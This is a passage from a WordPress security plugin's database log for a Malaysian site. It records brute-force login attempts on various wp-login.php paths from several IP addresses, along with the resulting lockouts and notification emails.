empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYI2nkXpgmG5P@iB8kWAwAAAIA\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"213.202.100.9\";s:11:\"REMOTE_PORT\";s:5:\"55768\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYI2nkXpgmG5P@iB8kWAwAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065178.9617\";s:12:\"REQUEST_TIME\";s:10:\"1569065178\";}}','notice','2019-09-21 11:26:20','2019-09-21 11:26:19',17803560,19289088,'https://bintara.com.my/test/wp-login.php',1,0,'213.202.100.9'),(25590,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:26:19\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:26:19\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:41:19\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:41:19\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:26:20','2019-09-21 11:26:19',17888208,19289088,'https://bintara.com.my/test/wp-login.php',1,0,'213.202.100.9'),(25591,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:26:20','2019-09-21 11:26:19',18093976,19289088,'https://bintara.com.my/test/wp-login.php',1,0,'213.202.100.9'),(25592,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYI3nkXpgmG5P@iB8kWBwAAAJg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.123.107\";s:11:\"REMOTE_PORT\";s:5:\"56140\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYI3nkXpgmG5P@iB8kWBwAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065184.0191\";s:12:\"REQUEST_TIME\";s:10:\"1569065184\";}}','notice','2019-09-21 11:26:25','2019-09-21 11:26:24',17798848,19288608,'https://bintara.com.my/wordpress/wp-login.php',1,0,'162.144.123.107'),(25593,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:26:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:26:24\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:41:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:41:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:26:25','2019-09-21 11:26:24',17883464,19288608,'https://bintara.com.my/wordpress/wp-login.php',1,0,'162.144.123.107'),(25594,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:26:25','2019-09-21 11:26:24',18089544,19288608,'https://bintara.com.my/wordpress/wp-login.php',1,0,'162.144.123.107'),(25595,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYI7XkXpgmG5P@iB8kWIwAAAIk\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"185.148.82.88\";s:11:\"REMOTE_PORT\";s:5:\"49730\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYI7XkXpgmG5P@iB8kWIwAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065200.1799\";s:12:\"REQUEST_TIME\";s:10:\"1569065200\";}}','notice','2019-09-21 11:26:41','2019-09-21 11:26:40',17803560,19289088,'https://bintara.com.my/2019/wp-login.php',1,0,'185.148.82.88'),(25596,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:26:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:26:40\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:41:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:41:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:26:41','2019-09-21 11:26:40',17888208,19289088,'https://bintara.com.my/2019/wp-login.php',1,0,'185.148.82.88'),(25597,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:26:41','2019-09-21 11:26:40',18093976,19289088,'https://bintara.com.my/2019/wp-login.php',1,0,'185.148.82.88'),(25598,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYJGTDrcQxTmGrCWuaLoQAAAcY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"92.222.9.173\";s:11:\"REMOTE_PORT\";s:5:\"60696\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYJGTDrcQxTmGrCWuaLoQAAAcY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065241.6649\";s:12:\"REQUEST_TIME\";s:10:\"1569065241\";}}','notice','2019-09-21 11:27:23','2019-09-21 11:27:22',17802856,19289016,'https://bintara.com.my/wp/wp-login.php',1,0,'92.222.9.173'),(25599,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:27:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:27:22\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:42:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:42:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:27:23','2019-09-21 11:27:22',17887616,19289016,'https://bintara.com.my/wp/wp-login.php',1,0,'92.222.9.173'),(25600,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:27:23','2019-09-21 11:27:22',18093656,19289016,'https://bintara.com.my/wp/wp-login.php',1,0,'92.222.9.173'),(25601,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYJTjDrcQxTmGrCWuaLrgAAAcQ\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"118.238.4.201\";s:11:\"REMOTE_PORT\";s:5:\"61757\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYJTjDrcQxTmGrCWuaLrgAAAcQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065294.3279\";s:12:\"REQUEST_TIME\";s:10:\"1569065294\";}}','notice','2019-09-21 11:28:15','2019-09-21 11:28:14',17799352,19289392,'https://bintara.com.my/test/wp-login.php',1,0,'118.238.4.201'),(25602,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:28:14\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:28:14\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:43:14\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:43:14\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:28:15','2019-09-21 11:28:14',17884032,19289392,'https://bintara.com.my/test/wp-login.php',1,0,'118.238.4.201'),(25603,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:28:15','2019-09-21 11:28:14',18089760,19289392,'https://bintara.com.my/test/wp-login.php',1,0,'118.238.4.201'),(25604,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYJcViJ7D9Gn7wDPh8YfwAAAM4\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"53068\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYJcViJ7D9Gn7wDPh8YfwAAAM4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065329.5227\";s:12:\"REQUEST_TIME\";s:10:\"1569065329\";}}','notice','2019-09-21 11:28:50','2019-09-21 11:28:49',17799352,19289392,'https://bintara.com.my/2019/wp-login.php',1,0,'93.114.86.226'),(25605,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 